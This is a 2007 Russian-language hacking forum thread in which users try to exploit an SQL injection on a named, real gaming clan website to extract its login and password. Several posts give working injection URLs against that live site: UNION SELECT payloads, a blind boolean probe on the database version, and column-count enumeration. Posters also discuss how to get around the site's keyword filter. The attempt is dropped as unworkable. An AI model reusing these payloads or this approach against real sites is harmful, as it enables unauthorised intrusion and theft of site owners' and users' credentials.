 |
Проблема с нахождением таблиц |
01.11.2007, 06:41
|
|
Познающий
Регистрация: 15.06.2007
Сообщений: 91
С нами:
9951302
Репутация:
38
|
|
Проблема с нахождением таблиц
Народ....есть сайтец де я нашёл скулю, вопщем у меня проблема с нахождением таблиц, может кто нють подскажет как пас и логин выпросить?
ЗЫ: сайт для клана cs. типа на cms написан
Код:
svin[dot]teamcs[dot]ru
скуля типа тут
Код:
svin[dot]teamcs[dot]ru/clanwars/index.php?action=details&id=-9999
помогите чем сможете плиз! |
|
|
01.11.2007, 07:18
|
|
Постоянный
Регистрация: 01.02.2006
Сообщений: 970
С нами:
10669286
Репутация:
1942
|
|
http://svin.teamcs.ru/forum/index.php?action=showthread&kid=12&id=-7+union+select+1/*&page=1#p1
но заставить его - что либо выполнить неполучилось... собственно как я и непонял где вывод... сначала думал сорс.. оказалось - хрен...
|
|
|
|
01.11.2007, 12:36
|
|
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
С нами:
10516826
Репутация:
3742
|
|
сработал бы посимыольный брутфорс.. если бы это был не sweb.ru ... фильтр на from и еще несколько слов для запросов во всем массиве request
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
|
|
|
|
01.11.2007, 17:52
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами:
10274726
Репутация:
1917
|
|
Сообщение от blackybr
сработал бы посимыольный брутфорс.. если бы это был не sweb.ru ... фильтр на from и еще несколько слов для запросов во всем массиве request
Да нет, посимвольный брутфорс бы так и так не сработал, т.к. там мускул 4.0 т.е. подзапросы не используешь, а так версию и юзера можно узнать
Код:
http://svin.teamcs.ru/forum/index.php?action=showthread&kid=12&id=20%20or%20substring(version(),3,1)=0
там где надпись "site:" при правельном запросе появляются цифры 1 2, а при неправильном только 1
да, and некатит, надо использовать or
2blackybr объясни поподробней плз как там сделана фильтрация, т.е как я понимаю sql запрос исполняется, а потом только делает редирект, т.к. если фром использовать в ошибочном запросе, редиректа не происходит, просто интересно как весь этот механизм работает
__________________
Карфаген должен быть разрушен...
|
|
|
|
01.11.2007, 19:31
|
|
Познающий
Регистрация: 15.06.2007
Сообщений: 91
С нами:
9951302
Репутация:
38
|
|
Народ, а чё вы на форум перешли?
Вот тут точная скуля:
Код:
http://svin.teamcs.ru/clanwars/index.php?action=details&id=-9999+union+select+0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8--
|
|
|
|
01.11.2007, 19:47
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами:
10274726
Репутация:
1917
|
|
Сообщение от Tw!m4
Народ, а чё вы на форум перешли?
Вот тут точная скуля:
Код:
http://svin.teamcs.ru/clanwars/index.php?action=details&id=-9999+union+select+0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8--
Это ничего не меняет, поверь...
__________________
Карфаген должен быть разрушен...
|
|
|
|
01.11.2007, 20:50
|
|
Познающий
Регистрация: 15.06.2007
Сообщений: 91
С нами:
9951302
Репутация:
38
|
|
ну тут хотяб выводится ошибка
Код:
The used SELECT statements have a different number of columns
я уже до 75-ой колонки дошел, а ошибка всё та же =(......какие будут предложения? |
|
|
|
01.11.2007, 21:25
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами:
10274726
Репутация:
1917
|
|
никаких, ты ничего не выведешь, order by показывает, что там одно поле, но при использовании union select появляется ошибка, но даже если будет вывод полей информацию ты все равно не получишь, т.к. там цитирую blackybr`а
фильтр на from и еще несколько слов для запросов во всем массиве request
еще раз говорю, забудь и немучайся
__________________
Карфаген должен быть разрушен...
|
|
|
|
01.11.2007, 21:32
|
|
Познающий
Регистрация: 15.06.2007
Сообщений: 91
С нами:
9951302
Репутация:
38
|
|
оке, всем спасибо......тема клосед!
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
